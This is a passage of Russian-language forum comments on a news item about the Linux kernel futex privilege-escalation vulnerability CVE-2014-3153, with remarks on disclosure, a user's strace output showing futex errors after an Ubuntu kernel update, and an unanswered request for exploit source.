Да, тут есть в новой новости иллюстрация - там где про секурный L4. Если ядро ничего не умеет - то и багов в нем нет. Это, конечно, логично, но... если чуть продолжить эту мысль, можно немного повысить безопасность, отключив питание компьютера. К сожалению, это несколько понижает полезность компьютера. Ну вот и грызут небезопасные кактусы...

Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

70. "Я ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от AX (ok) on 06-Июн-14, 21:06 
Что-то они зачастили в последнее время.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

74. "Я ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Мистер Икс on 06-Июн-14, 21:17 
> Что-то они зачастили в последнее время.

Когда действуют в опережение, в этом нет ничего плохого. Хуже, когда все шито-крыто.
Хорошо вот, что openssl открытая, а то никогда бы ничего не нашли, а разработчики торговали бы уязвимостями. Настанет время и линукс наш любимый станет использоваться во всем мире, а ошибки будут находить в миллион раз быстрее, никто не успеет их использовать.

Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

110. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от Аноним (??) on 09-Июн-14, 10:14 
После установки свежего обновления ядра в Ubuntu перестали запускаться куча программ, по strace стопорится на

futex(0xb83e0160, FUTEX_UNLOCK_PI_PRIVATE, 1318900) = -1 EPERM (Operation not permitted)
futex(0xb83d6e74, FUTEX_WAIT_PRIVATE, 1, NULL

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

117. "Я ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от KASRU email(ok) on 25-Июн-14, 17:28 
> В ядре Linux выявлена (http://openwall.com/lists/oss-security/2014/06/05/22) уязвимость
> (CVE-2014-3153), позволяющая локальному пользователю выполнить код с привилегиями ядра.

Где скачать исходники exploit использующий эту уязвимость?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру